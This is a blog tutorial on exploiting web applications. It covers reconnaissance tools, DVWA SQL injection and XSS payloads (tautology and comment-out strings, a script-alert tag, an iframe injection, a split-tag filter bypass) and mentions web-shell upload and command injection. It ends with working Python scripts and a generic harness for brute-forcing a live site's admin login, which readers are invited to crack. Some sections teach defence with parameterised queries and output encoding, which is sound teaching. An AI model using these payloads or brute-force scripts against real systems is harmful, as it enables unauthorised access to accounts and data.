Exploiting Web Applications

Created On 30. Apr 2020

Updated: 2021-05-01 23:44:40.875422000 +0000

Created By: acidghost

Exploiting web applications can be a lot of fun as well. Here are some simple tools you can use to get a better idea of the vulnerabilities of a web app.

whatweb gives information about the app hosted on a domain, as well as the server type, the IP address and, in some cases, the versions of the languages and frameworks behind it.
Run it like this against this blog:
# whatweb zonaincognita.com
There is something interesting there, but let's check something else.
# whatweb mechaplay.com
This time we also see the PHP and jQuery versions. And I really tried to beef it up with a lot of plugins and whatnot. Well, that's WordPress for you.

wafw00f is a tool for detecting and fingerprinting web application firewalls. It ships with Kali and you can launch it like this:
# wafw00f http://zonaincognita.com

lbd (load balancing detector) finds out whether a domain is using DNS or HTTP load balancing.
Check this out:
# lbd www.zonaincognita.com

httrack copies (mirrors) a whole website to your local disk.
Install it like this:
# sudo apt-get install httrack
then fire it off:
# httrack "http://zonaincognita.com" -O "/tmp/httrack" -v
Careful, as mirroring a whole site can eat a lot of disk space and bandwidth, and every single request ends up in the target's logs :wink:

This tool checks the certificate details by querying the SSL/TLS services on the host. We'll check that once SSL is properly enabled here ;)

DVWA On Metasploitable
We will look at the Metasploitable system in more detail later. Meanwhile, here is a short reference on its Damn Vulnerable Web Application (DVWA) and the kinds of exploits that can be run against it.

SQL Injection
This type of attack injects SQL syntax through user input that the web application concatenates into the query it sends to the back-end database. The simplest form is tautological injection, which is also one of the most frequent types used. An example is 1 or 0=0: 0=0 is an unconditionally true expression, so if it lands in the WHERE clause of a query it matches every row, which reveals whole database tables and bypasses a login check that only looks for one matching user/password row. In a string context the attacker first has to close the open quote, e.g. ' or '1'='1, and usually comments out the rest of the query with --.
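To see the tautology at work without a DVWA box, here is an added example (mine, not code from the original page) that builds an in-memory SQLite table with a couple of constructed rows and runs the page's 1 or 0=0 payload against a query that pastes the input into the SQL, and a ' OR 1=1 -- payload against a string-concatenated login check. The same lookups with bound parameters are shown beside them; those return nothing, because the driver never lets the value become part of the statement. The table, rows and user names are all assumptions made up for the demo.

```python
import sqlite3

# Constructed sample rows for this example; not data from the original page.
USERS = [("admin", "s3cret"), ("alice", "hunter2")]


def make_db():
    """In-memory users table seeded with the constructed rows above."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    con.executemany("INSERT INTO users (name, password) VALUES (?, ?)", USERS)
    return con


def lookup_vulnerable(con, user_id):
    """Numeric context: the id is pasted into the query, so '1 or 0=0' becomes
    WHERE id = 1 or 0=0, which is true for every row."""
    sql = "SELECT name FROM users WHERE id = " + user_id
    return sorted(r[0] for r in con.execute(sql))


def lookup_safe(con, user_id):
    """Same lookup with a bound parameter: the whole input is compared as one value."""
    rows = con.execute("SELECT name FROM users WHERE id = ?", (user_id,))
    return sorted(r[0] for r in rows)


def login_vulnerable(con, name, password):
    """String context: the attacker closes the open quote, adds the tautology,
    then comments out the password check with --."""
    sql = ("SELECT name FROM users WHERE name = '" + name
           + "' AND password = '" + password + "'")
    return sorted(r[0] for r in con.execute(sql))


def login_safe(con, name, password):
    """Parameterised query: quotes inside the values never change the statement."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return sorted(r[0] for r in con.execute(sql, (name, password)))


if __name__ == "__main__":
    con = make_db()
    print(lookup_vulnerable(con, "1 or 0=0"))         # ['admin', 'alice']
    print(lookup_safe(con, "1 or 0=0"))               # []
    print(login_vulnerable(con, "' OR 1=1 --", "x"))  # ['admin', 'alice']: in without a password
    print(login_safe(con, "' OR 1=1 --", "x"))        # []
```

Note the difference between the two contexts: the numeric one needs no quote at all, which is why 1 or 0=0 is such a common first probe, while the string one needs the closing quote and the trailing comment to keep the rest of the statement from breaking.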

Cross-site scripting (XSS) attacks, and the other DVWA exercises, work the following ways:
1. Execute scripts from text fields on a website. For example, if the site is prone to XSS, this script pasted into the text field and submitted will pop up an alert:
<script>alert("XSS Scripting")</script>
2. Defacement: load another website inside the page through the text box:
<iframe src=http://www.zonaincognita.com></iframe>
3. File upload: upload a malicious script (for example a PHP web shell) if the type of uploaded files is not screened.
4. Command injection: execute OS commands, or read the contents of files on the target system itself, through an input field whose value is passed to a shell.
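What you actually check after pasting those payloads is whether the markup comes back in the response unencoded. Here is an added example (mine, not code from the page or from DVWA) with three tiny renderers standing in for a reflected input field: one that echoes the input as-is, one with a naive blacklist that strips the literal <script> tag (an assumed filter, of the kind DVWA's medium level uses), and one that entity-encodes the output. The third payload, a split <scr<script>ipt> tag, is constructed here to show why blacklists fail: stripping <script> out of it leaves a valid <script> tag behind.

```python
import html

# The two payloads from the DVWA notes above, plus a filter-evasion variant
# constructed for this example.
PAYLOADS = {
    "script": '<script>alert("XSS Scripting")</script>',
    "iframe": '<iframe src=http://www.zonaincognita.com></iframe>',
    "split_script": '<scr<script>ipt>alert("XSS Scripting")</scr<script>ipt>',
}


def render_vulnerable(name):
    """Reflects the input straight into the page (assumed 'low' behaviour)."""
    return "<pre>Hello " + name + "</pre>"


def render_blacklist(name):
    """Naive blacklist: removes every literal '<script>' and nothing else.
    Assumed filter for illustration; a classic 'medium' level mistake."""
    return "<pre>Hello " + name.replace("<script>", "") + "</pre>"


def render_safe(name):
    """Output encoding: <, >, &, ' and " become entities, so the browser shows
    the payload as text instead of parsing it as markup."""
    return "<pre>Hello " + html.escape(name, quote=True) + "</pre>"


def markup_survives(page):
    """The tester's check: did an active <script> or <iframe> tag reach the
    response unencoded? (Case-insensitive, since browsers are.)"""
    lowered = page.lower()
    return "<script>" in lowered or "<iframe" in lowered


def probe(render):
    """Run every payload through one renderer; True means injectable."""
    return {label: markup_survives(render(p)) for label, p in PAYLOADS.items()}


if __name__ == "__main__":
    print(probe(render_vulnerable))   # all True
    print(probe(render_blacklist))    # script False, iframe True, split_script True
    print(probe(render_safe))         # all False
```

The blacklist result is the one worth remembering: it stops the textbook payload and nothing else, which is exactly what a first-pass scan of a "fixed" field tends to miss.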

Brute forcing this blog
There is no fun without actually trying to break something, right?
I encourage you to try to crack the password of my blog with scripts such as the ones below.
We are using the mechanize Python module to navigate through the pages and take the candidate passwords from a 'passwords.txt' wordlist, one per line.
You can similarly go with a list of emails for the email field. Now you know better why hackers steal emails and how they are used. On the black market you can get lists of 50K email and password combinations for less than $1. Are you in there as well? I found that there have been multiple instances of my accounts being pwned. Happens to all of us.
Each response is written to a txt file with the attempt number appended to the end of the file name, so you can grep them for a successful login afterwards. Never mind the long path, that's just for fun :feelsgood:

import mechanize

url = "http://zonaincognita.com/noautomationorencryptionorwhatsoeveranywayhereisasuperlongpathforyouwhichis318bits/admin_users/sign_in"
browser = mechanize.Browser()
browser.set_handle_robots(False)  # otherwise mechanize refuses URLs disallowed by robots.txt
attackNumber = 1

with open('passwords.txt') as f:
	for line in f:
		password = line.rstrip('\n')  # drop the newline, or every guess is wrong
		browser.open(url)              # reload the login page: fresh form (and CSRF token) each time
		browser.select_form(nr=0)      # the first form on the page is the sign-in form
		browser["admin_user[email]"] = 'my email here'
		browser["admin_user[password]"] = password

		res = browser.submit()
		content = res.read()
		print(res.code)

		# save every response so we can grep for 'Signed in successfully' later
		with open('response' + str(attackNumber) + '.txt', 'wb') as output:
			output.write(content)
		attackNumber += 1

Here is the same script, but this time we let it generate the candidates for us, assuming the password is 8 lowercase ASCII letters. Be realistic about that keyspace: 26^8 is about 2.1 x 10^11 candidates, so over HTTP this will never finish. It is here to show the technique; a wordlist, or a mask that fits a known password policy, is what you would use in practice:

import mechanize
from itertools import product
from string import ascii_lowercase

url = "http://zonaincognita.com/noautomationorencryptionorwhatsoeveranywayhereisasuperlongpathforyouwhichis318bits/admin_users/sign_in"
browser = mechanize.Browser()
browser.set_handle_robots(False)
attackNumber = 1

# product(), not combinations(): combinations() only yields sorted 8-letter subsets
# with no repeated letters, so it would never produce e.g. 'password'
passwords = (''.join(p) for p in product(ascii_lowercase, repeat=8))

for password in passwords:
	browser.open(url)
	browser.select_form(nr=0)
	browser["admin_user[email]"] = 'the email comes here'
	browser["admin_user[password]"] = password

	res = browser.submit()
	content = res.read()
	print(res.code)

	with open('response' + str(attackNumber) + '.txt', 'wb') as output:
		output.write(content)
	attackNumber += 1

	if b'Signed in successfully' in content:
		print('found it: ' + password)
		break

On a successful login the response contains 'Signed in successfully', otherwise it contains 'Invalid email or password'. Grep the saved response files for the first string to find the hit.
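To make the procedure above reusable, and to put numbers on the 8-letter keyspace, here is an added example of mine (not the blog's scripts). It separates candidate generation (wordlist first, exhaustive search only if asked) from the attack loop, stops at the first 'Signed in successfully', and treats any response that is neither the success nor the failure string as a sign that a lockout, CAPTCHA or rate limit kicked in. The login endpoint is a constructed fake so the example runs offline; against a live target you would pass in a function that submits the form with mechanize or requests and returns the response text. The email, the wordlist and the fake endpoint's behaviour are all assumptions.

```python
from itertools import product
from string import ascii_lowercase

SUCCESS = "Signed in successfully"
FAILURE = "Invalid email or password"


def keyspace(charset, length):
    """Number of candidates in an exhaustive search over charset^length."""
    return len(charset) ** length


def hours_at_rate(size, attempts_per_second):
    """How long an online attack at the given request rate would take."""
    return size / attempts_per_second / 3600.0


def candidates(wordlist, charset="", length=0):
    """Yield wordlist entries first (cheap, likely), then, only if asked,
    every string of `length` characters over `charset` (exhaustive)."""
    for word in wordlist:
        word = word.strip()
        if word:
            yield word
    if charset and length:
        for chars in product(charset, repeat=length):
            yield "".join(chars)


def brute_force(post, email, cands, max_attempts=None):
    """post(email, password) must return the response body as text.
    Returns (password, attempts) on success, (None, attempts) otherwise.
    A body with neither marker string aborts the run: that usually means the
    target started blocking us and further guesses are wasted."""
    attempts = 0
    for password in cands:
        attempts += 1
        body = post(email, password)
        if SUCCESS in body:
            return password, attempts
        if FAILURE not in body:
            raise RuntimeError("unexpected response at attempt %d: %r" % (attempts, body[:80]))
        if max_attempts is not None and attempts >= max_attempts:
            break
    return None, attempts


def fake_login(real_email, real_password):
    """Constructed stand-in for the sign-in endpoint so the example runs offline.
    It answers with the two marker strings the real form uses."""
    def post(email, password):
        if (email, password) == (real_email, real_password):
            return "<div class='flash'>" + SUCCESS + "</div>"
        return "<div class='flash'>" + FAILURE + "</div>"
    return post


if __name__ == "__main__":
    wordlist = ["123456\n", "letmein\n", "qwerty\n"]   # constructed; the real script reads passwords.txt
    post = fake_login("admin@example.com", "letmein")
    print(brute_force(post, "admin@example.com", candidates(wordlist)))  # ('letmein', 2)
    size = keyspace(ascii_lowercase, 8)
    print(size)                                  # 208827064576
    print(round(hours_at_rate(size, 100)))       # 580075 hours at 100 requests/s
```

At 100 requests per second the 8-lowercase-letter space takes about 580,000 hours, which is why the wordlist goes first and why the abort-on-unexpected-response check matters: a lockout after a few hundred guesses is far more likely than a hit in the exhaustive phase.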

Section: Web